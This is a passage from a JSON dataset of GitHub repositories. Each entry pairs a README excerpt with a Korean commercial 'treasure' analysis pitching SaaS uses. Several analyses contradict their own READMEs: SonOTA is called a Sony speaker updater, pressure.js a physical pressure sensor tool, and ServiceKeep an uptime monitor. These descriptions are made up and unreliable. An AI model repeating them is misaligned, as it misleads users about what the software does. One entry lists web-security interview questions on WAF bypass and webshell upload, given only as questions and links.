with:\n\n```\nnpm install belle\n```\n\n### Import & use Belle Components\n\nWe recommend you to get started with [React](https://facebook.github.io/react/) first. Once you have a simple application setup you can import any Belle ","composite_score":0.3042,"license_safety_tag":"safe"},{"name":"zhaoweiho/web-sec-interview","github_url":"https://github.com/zhaoweiho/web-sec-interview","stars":6,"language":"","license":"unknown","abandonment_months":83,"description":"# web-sec-interview 분석 보고서\n\n## 왜 보물인가\n인터넷 보안 면접을 준비하는 사람들을 위한 학습 자료 모음으로, 웹 보안 지식을 체계적으로 정리한 희귀한 한국어 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 교육 플랫폼 SaaS**: 보안 직무 면접 준비생을 위한 구독형 학습 사이트로 운영 (월 구독료 수익)\n2. **기","readme_excerpt":" # web-sec-interview\n\nInformation Security Industry Practitioners (Web Security / Penetration Testing) Interview Questions 1.1\n\n### README English | [中文](README_CN.md)\n\n---\n\n   * Introduce the experience of burrowing (or CTF experience) that you think is interesting\n\n   * What are the more vulnerabilities you usually use? The principle of related vulnerabilities? And a fix for the vulnerability?\n\n   * What tools do you usually use and the characteristics of the corresponding tools?\n \n   * How to do sql injection / upload Webshell if you encounter waf? Please write the process of bypassing WAF (SQLi, XSS, upload vulnerability)\n   \n     Refer to the following three\n    \n  <a href=\"https://xz.aliyun.com/t/265/\">My Way of WafBypass (SQL Injection)</a><br />\n  <a href=\"https://xz.aliyun.com/t/337/\">My Way of WafBypass (Upload)</a><br />\n  <a href=\"https://xz.aliyun.com/t/265/\">My Way of WafBypass (Misc)</a><br />\n\n   * Talk about the idea of ​​lifting the rights of Windows system and Linux ","composite_score":0.3041,"license_safety_tag":"unknown"},{"name":"andydbc/HologramShader","github_url":"https://github.com/andydbc/HologramShader","stars":12,"language":"C#","license":"mit","abandonment_months":33,"description":"# HologramShader 시장 분석\n\n## 왜 보물인가\n게임과 영상 제작에서 홀로그램 같은 특수 효과를 쉽게 만들 수 있는 도구로, 전문가 수준의 비주얼을 누구나 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 SaaS 플랫폼**\n- 게임 제작자들을 위한 구독형 이펙트 라이브러리로 월 이용료 수금\n\n**2. 영상 편집 소프트웨어 ","readme_excerpt":"Hologram [![License](https://img.shields.io/badge/License-MIT-lightgrey.svg?style=flat)](http://mit-license.org) [![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.me/andyduboc/5usd)\n==========\n\nHologram is a simple shader made in Unity.<br>\nThis package is composed of a shader and a custom material editor to tweak the effect. \n\n ![screenshot](Screenshots/screen00.gif)\n \nMaterial\n-------\n\nIt is a composition of multiples effects, you can toggle it directly from this inspector:\n\n ![screenshot](http://i.imgur.com/8AWSkCZ.png)\n\n License\n-------\n\nMIT, see [LICENSE](LICENSE) for details.\n","composite_score":0.3041,"license_safety_tag":"safe"},{"name":"AlexeyAB/darknet","github_url":"https://github.com/AlexeyAB/darknet","stars":8,"language":"C","license":"NOASSERTION","abandonment_months":5,"description":"# AlexeyAB/darknet 분석\n\n## 왜 보물인가\n실시간으로 사물을 인식하고 추적하는 인공지능 기술로, CCTV, 드론, 자동차 등 다양한 분야에서 자동 감시 및 분석 시스템을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 편의점/공장용 실시간 물체 감지 모니터링 웹 서비스 (월간 구독형)\n- **내부 업무 도구**: ","readme_excerpt":"# Yolo v4, v3 and v2 for Windows and Linux\n\n* Read the FAQ:  https://www.ccoderun.ca/programming/darknet_faq/\n* Join the Darknet/YOLO Discord:  https://discord.gg/zSq8rtW\n* Recommended GitHub repo for Darknet/YOLO:  https://github.com/hank-ai/darknetcv/\n* Hank.ai and Darknet/YOLO:  https://hank.ai/darknet-welcomes-hank-ai-as-official-sponsor-and-commercial-entity/\n\n## (neural networks for object detection)\n\n* Paper **YOLOv7**: https://arxiv.org/abs/2207.02696\n\n* source code YOLOv7 - Pytorch (use to reproduce results): https://github.com/WongKinYiu/yolov7\n\n----\n\n* Paper **YOLOv4**: https://arxiv.org/abs/2004.10934\n\n* source code YOLOv4 - Darknet (use to reproduce results): https://github.com/AlexeyAB/darknet\n\n----\n\n* Paper **Scaled-YOLOv4 (CVPR 2021)**: https://openaccess.thecvf.com/content/CVPR2021/html/Wang_Scaled-YOLOv4_Scaling_Cross_Stage_Partial_Network_CVPR_2021_paper.html\n\n* source code Scaled-YOLOv4 - Pytorch (use to reproduce results): https://github.com/WongKinYiu/ScaledYOLOv4","composite_score":0.3041,"license_safety_tag":"unknown"},{"name":"openeventdata/mordecai","github_url":"https://github.com/openeventdata/mordecai","stars":6,"language":"Python","license":"mit","abandonment_months":57,"description":"# Mordecai 저장소 분석\n\n## 왜 보물인가\n텍스트에서 자동으로 지명(도시, 국가 등)을 찾아내는 기술로, 뉴스나 보고서에서 어디서 일어난 사건인지 자동으로 파악할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 뉴스 회사나 언론사를 위한 \"지명 자동 태깅\" 클라우드 플랫폼\n- **내부 업무 도구**: 대규모 데이터 분석 회사의","readme_excerpt":"![](paper/mordecai_geoparsing.png)\n\nFull text geoparsing as a Python library. Extract the place names from a\npiece of English-language text, resolve them to the correct place, and return\ntheir coordinates and structured geographic information.\n\n**Mordecai is ready for an upgrade!** Please take the user survey [here](https://z0l4ihmu0ud.typeform.com/to/b8FmCfMt) \nto help shape what v3 will look like.\n\nExample usage\n-------------\n\n```\n>>> from mordecai import Geoparser\n>>> geo = Geoparser()\n>>> geo.geoparse(\"I traveled from Oxford to Ottawa.\")\n\n[{'country_conf': 0.96474487,\n  'country_predicted': 'GBR',\n  'geo': {'admin1': 'England',\n   'country_code3': 'GBR',\n   'feature_class': 'P',\n   'feature_code': 'PPLA2',\n   'geonameid': '2640729',\n   'lat': '51.75222',\n   'lon': '-1.25596',\n   'place_name': 'Oxford'},\n  'spans': [{'end': 22, 'start': 16}],\n  'word': 'Oxford'},\n {'country_conf': 0.83302397,\n  'country_predicted': 'CAN',\n  'geo': {'admin1': 'Ontario',\n   'country_code3': 'CAN',\n   ","composite_score":0.3041,"license_safety_tag":"safe"},{"name":"kodsnack/advent_of_code_2017","github_url":"https://github.com/kodsnack/advent_of_code_2017","stars":15,"language":"Python","license":"unknown","abandonment_months":30,"description":"# Advent of Code 2017 저장소 분석\n\n## 왜 보물인가\n매년 수십만 명이 참여하는 프로그래밍 퍼즐 대회의 2017년 문제와 풀이를 모아놓은 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: 입문자용 코딩 강좌에서 실제 문제 풀이 사례를 단계별로 제공하는 교재로 활용\n2. **내부 업무 도구**: 개발팀의 신입 온","readme_excerpt":"# Advent of code 2017 #\nBidra med dina lösningar på problemen i [Advent of code](http://adventofcode.com/), i vilket språk du vill. Välj ett du kan, eller ett du vill lära dig!\n\nSe till att du går med i advent of code's topplista om du vill ha en chans att vinna kodsnack's tävling. Vårat topplista har ID: `194162-e06e748d`. Det finns även en slack kanal för alla som är med. Maila info@kodsnack.se eller twittra din epost till @kodsnack så släpper vi in er.\n\nDe första problemen kommer första december, de sista den tjugofemte, och vi delar ut ett pris till den eller de som dels har högst poäng på den leaderboard vi kommer att skapa, dels bidragit med alla sin lösningar här. Som förra året är det två delproblem för varje dag. Samtliga 50 problem ska alltså finnas med i en komplett lösning. Det är givetvis fritt fram att bidra med lösningar för så många eller få problem man har tid och lust med, tävlingsmomentet är inte det viktiga här!\n\nDina lösningar får gärna checkas in i en mapp med nam","composite_score":0.3041,"license_safety_tag":"unknown"},{"name":"addy-dclxvi/almighty-dotfiles","github_url":"https://github.com/addy-dclxvi/almighty-dotfiles","stars":8,"language":"C","license":"unknown","abandonment_months":78,"description":"# almighty-dotfiles 분석 보고서\n\n## 왜 보물인가\n컴퓨터를 처음 다루는 사람들도 자신의 작업 환경을 쉽게 설정할 수 있도록 미리 만들어둔 설정 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **신입 개발자 온보딩 SaaS**: 회사 입사한 개발자들이 처음 컴퓨터 설정할 때 이 설정을 자동으로 적용해주는 서비스\n2. **개발 환경 자동화 AP","readme_excerpt":"![dotfiles](https://raw.githubusercontent.com/addy-dclxvi/almighty-dotfiles/master/header.png)\n\n## Introduction\nA collection of configs to be placed in the user's home directory usually prefixed with a period, hence the name dotfiles.\nThis repo is actually intended for my personal backup, but everyone is welcome to use these resources. \nMaybe not always up to date with my current setup.\nI also put some explanations in this README file, because people say they are interested with my setup. I hope this will be useful.\nAlso, please read what is written inside the files before use. And remember, copying configuration file doesn't make it instantly work :wink: <br />\n\n## Preview\n\n## Openbox : Vinyl\n![preview-openbox](https://raw.githubusercontent.com/addy-dclxvi/almighty-dotfiles/master/preview-openbox.jpg) <br />\n**Openbox Theme** : Arroundie (included in this repo). To get the rounded corner, you need *openbox-patched* (AUR). \nOr if you are on Debian, you can read [this](https://forums.bu","composite_score":0.304,"license_safety_tag":"unknown"},{"name":"nanopore-wgs-consortium/NA12878","github_url":"https://github.com/nanopore-wgs-consortium/NA12878","stars":7,"language":"Python","license":"NOASSERTION","abandonment_months":43,"description":"# nanopore-wgs-consortium/NA12878 분석 보고서\n\n## 왜 보물인가\n유전자 검사 기술의 새로운 방식인 나노포어 시퀀싱으로 얻은 실제 인간 유전정보 데이터셋으로, 질병 진단과 개인맞춤 의료 분야의 핵심 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 유전자 검사 서비스 (SaaS)**\n- 일반인이 자신의 유전정보를 분석받는 온라인 ","readme_excerpt":"# Oxford Nanopore Human Reference Datasets\n\n## Quick Links\n\n  * [Genomic DNA project](Genome.md)\n\n  * [RNA project](RNA.md)\n\n## Data availability\n\n### Notes on downloading files.\n\nFiles are generously hosted by Amazon Web Services. Although available as straight-forward HTTP links, download performance is improved by using the Amazon Web Services <a href=\"https://aws.amazon.com/cli/\">command-line interface</a>. References should be amended to use the `s3://` addressing scheme, i.e. replace `http://s3.amazon.com/nanopore-human-wgs/` with `s3://nanopore-human-wgs` to download. For example, to download `rel3-nanopore-wgs-288418386-FAB39088` to the current working directory use the following command.\n\n    aws s3 cp s3://nanopore-human-wgs/rel3-nanopore-wgs-288418386-FAB39088.fastq.gz .\n\nAmending the `max_concurrent_requests` etc. settings as per <a href=\"http://docs.aws.amazon.com/cli/latest/topic/s3-config.html\">this guide</a> will improve download performance further.\n\n# Contact\n\nPlease ","composite_score":0.304,"license_safety_tag":"unknown"},{"name":"stuyam/pressure","github_url":"https://github.com/stuyam/pressure","stars":5,"language":"JavaScript","license":"mit","abandonment_months":42,"description":"# stuyam/pressure 프로젝트 분석\n\n## 왜 보물인가\n압력(물리량)을 측정하고 관리하는 작업을 자동화할 수 있는 가벼운 도구로, 산업 현장이나 연구 분야에서 반복적인 센서 데이터 처리를 효율화합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 제조업체를 위한 압력 모니터링 클라우드 서비스 (기계 부품이 안전한 압력 범위에 있는지 ","readme_excerpt":"# Pressure.js\n\n[![Join the chat at https://gitter.im/yamartino/pressure](https://badges.gitter.im/yamartino/pressure.svg)](https://gitter.im/stuyam/pressure?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![npm https://www.npmjs.com/package/pressure](https://img.shields.io/npm/v/pressure.svg)](https://www.npmjs.com/package/pressure)\n[![npm https://www.npmjs.com/package/pressure](https://img.shields.io/npm/dt/pressure.svg)](https://www.npmjs.com/package/pressure)\n\n![Pressure Example](http://pressurejs.com/img/pressure.gif)\n\nPressure is a JavaScript library for handling both Force Touch and 3D Touch on the web, bundled under one library with a simple API that makes working with them painless.\n\nHead over to the [documentation](http://pressurejs.com/documentation.html) for installation instructions, supported devices, and more details on pressure.js.\n\n## Install\nDownload pressure.min.js or pressure.js files from GitHub or install with npm or bower\n#### npm\n```\nn","composite_score":0.304,"license_safety_tag":"safe"},{"name":"guimaizi/get_domain","github_url":"https://github.com/guimaizi/get_domain","stars":14,"language":"Python","license":"unknown","abandonment_months":76,"description":"# get_domain 분석 리포트\n\n## 왜 보물인가\n인터넷 주소(도메인)에서 필요한 정보를 자동으로 추출해주는 도구로, 웹사이트 관리나 데이터 수집이 필요한 모든 비즈니스에 유용합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 도메인 관리 SaaS 서비스**\n- 수천 개의 웹사이트를 관리하는 기업들이 도메인 정보를 자동 분류하고 정리하는 서비스로 제공 가능","readme_excerpt":"# 域名收集与监测V3.0\n### 简介\n在职业刷src或者apt攻击者的角度，单单过一遍爆破的域名是不能满足持续性漏洞挖掘;从职业刷src的角度，过一遍收集的子域名，已经发现了所有漏洞并已经提交后修复，或者用当前漏洞测试方法并没发现有漏洞，这样业务是安全的，但这个安全是在当下时间的，企业要发展、要解决当前问题，就会出新业务、或者不断的修复更新旧问题，这就是业务的变化，通过持续性监控子域名就会发现业务的变化，最快速度的发现变化，对变化进行安全测试、漏洞挖掘。有经验的刷src的同学都知道，新业务发现漏洞概率都很高。\n\n\n### 环境配置\n需要环境:\n* win10/8/7/xp  \n  其他请自行修改代码、反正是开源，改动也不大。\n* python3  \n  python3.5+ 自行官方下载\n* mongodb  \n  自行官方下载 建议docker搭建 参考:https://www.jianshu.com/p/6fdb2bcb4b43\n* chrome  \n  自行官方下载\n* chromedriver  \n  下载成功后放入python根目录或加入全局环境变量  \n  chromedriver下载地址:http://npm.taobao.org/mirrors/chromedriver/ 注:与当前chrome匹配\n* subfinder  \n  https://github.com/subfinder/subfinder win默认带有,其他请自行修改代码。\n\n以上配置完成,切进项目目录  \npip 安装requirements.txt\n>pip install -r requirements.txt\n\n# 搭建不成功的,自行google搜索\"python3 selenium chrome on linux/win/mac\"  这个只要跑成功,连接上mongodb就大功告成了 \n\n\n\n\n设置config.json\n```\n{\n\t\"path\":\"E:/code/test1\", //项目所在绝对路径\n\t\"target_json\":\"E:/code/test1/target/qq.json\",   //目标域名文件绝对路径\n\t\"chrome_path\":\"C:/Program Files (x86)/Google/Chrome/Application/chrome.","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"mirko/SonOTA","github_url":"https://github.com/mirko/SonOTA","stars":5,"language":"Python","license":"gpl-2.0","abandonment_months":73,"description":"# mirko/SonOTA 분석\n\n## 왜 보물인가\n소니 스피커 같은 음향기기를 무선으로 업데이트할 수 있는 기술로, 제조사 없이도 기기를 최신 상태로 유지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **음향기기 제조업체 SaaS**: 고객의 스피커/헤드폰을 원격으로 업데이트 관리하는 클라우드 서비스\n2. **가전사 내부 도구**: 출고된 제품들의 펌","readme_excerpt":"# SonOTA\n\nA script to update a Sonoff device from the stock firmware to [Sonoff-Tasmota](https://github.com/arendst/Sonoff-Tasmota/) purely over WiFi.\n\nThis is **beta** software, and it may not work 100% of the time, and require to manually flash your device using serial. Although it can not be guaranteed, it's unlikely the device will be damaged such that it can't be flashed with Sonoff-Tasmota via serial (the difficulty of this depends on the device and the headers in provides). Typically if it does not work, a power cycle restores the functionality to the default firmware.\n\n# ATTENTION: It appears SonOTA does *not* work with devices running current firmware #\n\nPlease refer to the [wiki](https://github.com/mirko/SonOTA/wiki) for known working versions. Devices running v1 firmware will not upgrade to v2, they appear to be different series of firmware for different devices, not upgrades from v1 to v2.\n\nSee [#58](https://github.com/mirko/SonOTA/issues/58) for more information. Please re","composite_score":0.3039,"license_safety_tag":"restricted"},{"name":"NoDivide/astrum","github_url":"https://github.com/NoDivide/astrum","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":49,"description":"# NoDivide/astrum 분석 보고서\n\n## 왜 보물인가\n별도의 설명이 없고 커밋이 2022년 5월에 멈춰 있어 현재 프로젝트의 상태와 목적이 불명확합니다.\n\n## 어디에 쓸 수 있나\n프로젝트 정보가 부족하여 구체적인 활용 시나리오를 파악할 수 없습니다. 저장소의 README 파일을 확인하면 용도를 판단할 수 있습니다.\n\n## 누구에게 팔 수 있나\n","readme_excerpt":"# Astrum\n\n***\nAstrum is nolonger actively maintained. We're fans of [Storybook](https://storybook.js.org) which you should check out as an alternative.\n***\n\nAstrum is a lightweight pattern library designed to be included with any web project.\n\nIt's non-opinionated and doesn't expect you to write your markup or code in any particular way.\n\nAn Astrum pattern library comprises of components organised into groups. Each component has a `markup.html` and `description.md` file which are\nused to render an example of the component along with a code sample. A group can also have an description and is used for organisational purposes.\nYou also have the option to add pages of content, for example an introduction page and/or coding guidelines specific to your project.\n\n[View a demo](http://astrum.nodividestudio.com/pattern-library/)\n\n\n## Sponsors\n\n### BrowserStack\nWe use BrowserStack to make sure that Astrum looks and works great in [modern browsers](#browser-support).\n\n<a href=\"http://browserstack","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"MasayaAoyama/kubernetes-perfect-guide","github_url":"https://github.com/MasayaAoyama/kubernetes-perfect-guide","stars":7,"language":"","license":"unknown","abandonment_months":57,"description":"# Kubernetes Perfect Guide 분석\n\n## 왜 보물인가\n클라우드 컴퓨팅의 핵심 기술인 쿠버네티스를 누구나 이해할 수 있게 정리한 학습 자료로, 기업의 IT 인프라 현대화에 필수적인 지식을 체계적으로 전달합니다.\n\n## 어디에 쓸 수 있나\n1. **기업 교육 플랫폼**: 직원들이 클라우드 기술을 배우는 온라인 교육 서비스로 판매\n2. **I","readme_excerpt":"# 『Kubernetes完全ガイド（第二版）』 付録マニフェストのリポジトリ\n\nはじめまして。\n青山真也（[@amsy810](https://twitter.com/@amsy810)）と申します。\n\nこの度は『Kubernetes完全ガイド（ `第二版` ）』を選んで頂き、誠にありがとうございます。\n（このリポジトリへのStarもお待ちしております。）\n\n電子書籍に関しては、Amazon以外からもPDFなどで入手可能です。\n* Amazon: https://www.amazon.co.jp/dp/4295009792\n* Impress: https://book.impress.co.jp/books/1119101148\n* その他いくつかのサイト\n\n\n## （注意）第一版について\n\nこちらのブランチは `第二版` 用です。\n`第一版` に関しては、[1st-edition branch](https://github.com/MasayaAoyama/kubernetes-perfect-guide/tree/1st-edition)を参照してください。\n\n```\n$ git checkout 1st-edition\n```\n\n# Kubernetes perfect guide \"2nd edition\" - sample manifest repository\n\nHello, I'm Masaya Aoyama ([@amsy810](https://twitter.com/@amsy810)).\n\nThank you for choosing \"kubernetes perfect guide \"2nd edition\".\nIf you like this repo, please add star :)\n\nYou can get E-book and PDF from Amazon or various sites.\n* Amazon: https://www.amazon.co.jp/dp/4295009792\n* Impress: https://book.impress.co.jp/books/1119101148\n* etc\n\n## Note: about 1st edition\n\nThis branch is for `2nd edi","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"xuningjack/ServiceKeep","github_url":"https://github.com/xuningjack/ServiceKeep","stars":13,"language":"Java","license":"unknown","abandonment_months":101,"description":"# ServiceKeep 저장소 분석\n\n## 왜 보물인가\n서비스의 안정성을 자동으로 감시하고 문제가 생기면 즉시 알려주는 시스템으로, 비즈니스 손실을 미리 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 클라우드 기반 업무 도구 제공 업체가 자신들의 서비스 가동 상태를 고객에게 실시간으로 보여주는 상태 페이지 서비스\n- **내부","readme_excerpt":"# ServiceKeep\nAndroid Service保活模块（5.0以下使用c来fork进程，5.0以上使用JobScheduler来保活进程）  \n\n### 具体调用:   \n1、在WorkService的onStartCommand中执行要保活的操作业务。  \n2、在初始化过程中调用KeepAliveManager.INSTANCE.startKeepAliveService(context);  \n3、停止服务调用KeepAliveManager.INSTANCE.stopKeepAliveSerice(context);  \n4、配置AndroidManifest.xml，增加如下配置：  \n&lt;!--增加唤醒WorkService的定时任务--&gt;    \n&lt;service  \n&emsp;&emsp;android:name=\"jack.com.servicekeep.service.KeepAliveJobSchedulerService\"  \n&emsp;&emsp;android:persistent=\"true\"  \n&emsp;&emsp;android:exported=\"false\"  \n&emsp;&emsp;android:permission=\"android.permission.BIND_JOB_SERVICE\"  \n&emsp;&emsp;android:process=\"jack.com.servicekeep.job_scheduler_service\"/&gt;  \n\n&lt;!--todo 自己业务保活的Service，重写WorkService中的onStartCommand其中执行自己的业务逻辑--&gt;     \n&lt;service    \n&emsp;&emsp;android:name=\"jack.com.servicekeep.service.WorkService\"  \n&emsp;&emsp;android:exported=\"true\"  \n&emsp;&emsp;android:persistent=\"true\"  \n&emsp;&emsp;android:label=\"Jack\"  \n&emsp;&emsp;android:process=\"com.jack.workser","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"jeff-leo/SpikeSystem","github_url":"https://github.com/jeff-leo/SpikeSystem","stars":99,"language":"Java","license":"unknown","abandonment_months":113,"description":"","readme_excerpt":"","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"hinesboy/ai_tetris","github_url":"https://github.com/hinesboy/ai_tetris","stars":11,"language":"C++","license":"unknown","abandonment_months":58,"description":"# ai_tetris 저장소 분석\n\n## 왜 보물인가\n인공지능이 스스로 게임을 배워 플레이하는 기술로, 게임 업계와 AI 교육 시장에서 매력적인 사례입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 개발사 내부 도구**: AI 캐릭터 자동 플레이 시스템으로 게임 밸런스 테스트 자동화\n2. **AI 학습 플랫폼 SaaS**: 대학교와 학원에서 인공지능 원리를","readme_excerpt":"## 俄罗斯方块\n\n- 采用C++与WinAPI方式实现，分为**普通玩家模式**与**AI模式**\n- 思维导图\n\n![思维导图](./img/Tetris.png)\n\n### 玩家模式\n\n#### 预览\n\n![玩家模式](./img/common.gif)\n\n### AI模式\n> [pierre-dellacheries算法详情](http://imake.ninja/el-tetris-an-improvement-on-pierre-dellacheries-algorithm)\n#### 预览\n\n> Gif制作工具略有卡顿 :)\n\n![AI模式](./img/ai.gif)\n\n#### 消除行数\n\n> 尚未测得，目前测试环境下，测试时间以及消除行数大约为**12小时60W行**，最终人为停止测试。\n","composite_score":0.3039,"license_safety_tag":"unknown"},{"name":"schibsted/layout","github_url":"https://github.com/schibsted/layout","stars":7,"language":"Swift","license":"mit","abandonment_months":41,"description":"# Schibsted/Layout 분석\n\n## 왜 보물인가\n웹사이트나 앱의 화면 구성을 쉽게 만들 수 있는 기초 틀(레이아웃 시스템)로, 디자인 일관성을 유지하면서 개발 시간을 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 신문사·출판사가 기사 관리 플랫폼을 만들 때 일관된 페이지 템플릿 제공\n2. **내부 업무 도구**: ","readme_excerpt":"[![Travis](https://img.shields.io/travis/nicklockwood/layout.svg)](https://travis-ci.org/schibsted/layout)\n[![Coveralls](https://coveralls.io/repos/github/nicklockwood/layout/badge.svg)](https://coveralls.io/github/schibsted/layout)\n[![Platform](https://img.shields.io/cocoapods/p/Layout.svg?style=flat)](http://cocoadocs.org/docsets/Layout)\n[![Swift](https://img.shields.io/badge/swift-5.1-orange.svg?style=flat)](https://developer.apple.com/swift)\n[![Swift](https://img.shields.io/badge/swift-4.2-red.svg?style=flat)](https://developer.apple.com/swift)\n[![License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://opensource.org/licenses/MIT)\n[![CocoaPods Compatible](https://img.shields.io/cocoapods/v/Layout.svg)](https://img.shields.io/cocoapods/v/Layout.svg)\n[![Carthage Compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\n# Layout\n\nLayout is a native Swift framework for implementing iOS user interf","composite_score":0.3038,"license_safety_tag":"safe"},{"name":"yassouali/ML_paper_notes","github_url":"https://github.com/yassouali/ML_paper_notes","stars":33,"language":"","license":"unknown","abandonment_months":49,"description":"","readme_excerpt":"\n\n# ML Papers\nThis repo contains notes and short summaries of some ML related papers I come across, organized by subjects and the summaries are in the form of PDFs.\n\n## Self-Supervised & Contrastive Learning\n\n- Self-Supervised Relational Reasoning for Representation Learning (2020): [[Paper]](https://arxiv.org/abs/2006.05849) [[Notes]](notes/103_SSL_relation_reasoning.pdf)\n- Big Self-Supervised Models are Strong Semi-Supervised Learners (2020) [[Paper]](https://arxiv.org/abs/2006.10029) [[Notes]](notes/95_big_self-supervised_models.pdf)\n- Debiased Contrastive Learning (2020) [[Paper]](https://arxiv.org/abs/2007.00224) [[Notes]](notes/97_debiased_contrastive_learning.pdf)\n- Selfie: Self-supervised Pretraining for Image Embedding (2019): [[Paper]](https://arxiv.org/abs/1906.02940) [[Notes]](notes/76_selfie_pretraining_for_img_embeddings.pdf)\n- Self-Supervised Representation Learning by Rotation Feature Decoupling (2019): [[Paper]](http://openaccess.thecvf.com/content_CVPR_2019/papers/Fen","composite_score":0.3038,"license_safety_tag":"unknown"},{"name":"RobTillaart/HX711","github_url":"https://github.com/RobTillaart/HX711","stars":116,"language":"C++","license":"MIT","abandonment_months":8,"description":"# HX711 저장소 분석\n\n## 왜 보물인가\n무게를 재는 센서(로드셀)를 간단하게 연결할 수 있도록 만든 오픈소스 도구로, 누구나 저울이나 무게 측정 장치를 직접 만들 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **IoT 저울 SaaS**: 스마트 체중계나 짐 무게 측정 앱으로 클라우드에 데이터를 저장하고 추이를 분석해주는 구독 서비스\n2. **","readme_excerpt":"\n[![Arduino CI](https://github.com/RobTillaart/HX711/workflows/Arduino%20CI/badge.svg)](https://github.com/marketplace/actions/arduino_ci)\n[![Arduino-lint](https://github.com/RobTillaart/HX711/actions/workflows/arduino-lint.yml/badge.svg)](https://github.com/RobTillaart/HX711/actions/workflows/arduino-lint.yml)\n[![JSON check](https://github.com/RobTillaart/HX711/actions/workflows/jsoncheck.yml/badge.svg)](https://github.com/RobTillaart/HX711/actions/workflows/jsoncheck.yml)\n[![GitHub issues](https://img.shields.io/github/issues/RobTillaart/HX711.svg)](https://github.com/RobTillaart/HX711/issues)\n\n[![License: MIT](https://img.shields.io/badge/license-MIT-green.svg)](https://github.com/RobTillaart/HX711/blob/master/LICENSE)\n[![GitHub release](https://img.shields.io/github/release/RobTillaart/HX711.svg?maxAge=3600)](https://github.com/RobTillaart/HX711/releases)\n[![PlatformIO Registry](https://badges.registry.platformio.org/packages/robtillaart/library/HX711.svg)](https://registry.platfor","composite_score":0.3038,"license_safety_tag":"safe"},{"name":"ryansolid/solid","github_url":"https://github.com/ryansolid/solid","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"<p>\n  <img src=\"https://assets.solidjs.com/banner?project=Library&type=core\" alt=\"SolidJS\" />\n</p>\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/solidjs/solid/main-ci.yml?branch=main&logo=github&style=for-the-badge)](https://github.com/solidjs/solid/actions/workflows/main-ci.yml)\n[![Coverage Status](https://img.shields.io/coveralls/github/solidjs/solid.svg?style=for-the-badge)](https://coveralls.io/github/solidjs/solid?branch=main)\n\n[![NPM Version](https://img.shields.io/npm/v/solid-js.svg?style=for-the-badge)](https://www.npmjs.com/package/solid-js)\n[![](https://img.shields.io/npm/dm/solid-js.svg?style=for-the-badge)](https://www.npmjs.com/package/solid-js)\n[![Discord](https://img.shields.io/discord/722131463138705510?style=for-the-badge)](https://discord.com/invite/solidjs)\n[![Subreddit subscribers](https://img.shields.io/reddit/subreddit-subscribers/solidjs?style=for-the-badge)](https://www.reddit.com/r/solidjs/)\n\n**[Website](https://www.solidjs.com/) • [AP","composite_score":0.3038,"license_safety_tag":"safe"},{"name":"smallwins/slack","github_url":"https://github.com/smallwins/slack","stars":20,"language":"JavaScript","license":"NOASSERTION","abandonment_months":50,"description":"# smallwins/slack 저장소 분석\n\n## 왜 보물인가\nSlack과 연동되어 팀의 업무 소통을 자동화하고 효율화할 수 있는 작은 도구로, 많은 기업들이 이미 사용 중인 Slack 플랫폼을 활용한 실질적인 비즈니스 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: Slack 기반 프로젝트 관리 도구 → 팀이 메시지 창에서 직접 업","readme_excerpt":"<h1 align=\"center\">\n  <img width=\"333px\" src=https://s3-us-west-1.amazonaws.com/bugbot/slack-js.svg alt=slack title=slack width=178>\n</h1>\n<p align=\"center\" style=\"font-size: 1.2rem;\">\n  <a href=https://www.npmjs.com/package/slack><img alt=npm src=https://badge.fury.io/js/slack.svg></a>\n  <a href=https://github.com/smallwins/slack/actions?query=workflow%3A%22Node+CI%22><img alt=\"Node CI\" src=https://github.com/smallwins/slack/workflows/Node%20CI/badge.svg></a>\n  <img alt=\"coverage 93.85%\" src=https://img.shields.io/badge/coverage-93.85%25-brightgreen.svg>\n</p>\n\n### A [Slack Web API](https://api.slack.com/methods) client :seedling::raised_hands::two_hearts:\n\n- Written in modern JavaScript; tested for Node and the browser\n- Complete support for the [Slack Web API](https://api.slack.com/methods)\n- Perfect symmetry: JS method signatures match Web API docs\n- Choose your async adventure: all methods accept either a Node style errback or return a `Promise`\n- Opt into an OO style class instanc","composite_score":0.3037,"license_safety_tag":"unknown"},{"name":"UniversaBlockchain/universa","github_url":"https://github.com/UniversaBlockchain/universa","stars":5,"language":"Java","license":"unknown","abandonment_months":39,"description":"# Universa 블록체인 저장소 분석\n\n## 왜 보물인가\n블록체인 기술을 활용해 디지털 문서의 진위 여부를 빠르고 안전하게 확인할 수 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 계약서, 금융 거래 증명 등 중요 문서의 위변조 방지 플랫폼\n- **내부 업무 도구**: 대기업의 전자계약 시스템 또는 법무팀의 문서 검증","readme_excerpt":"# Universa\n\n> __Important notice__. Domain `icodici.com` has recently been squatted with the help of a godaddy.com registrar that just cancelled the account (maybe because it was long time ago created by a Russian). They were even so kind to propose us to buy it back in their auction. __As Universa's main idea is to fight any type of fraud and unequity we 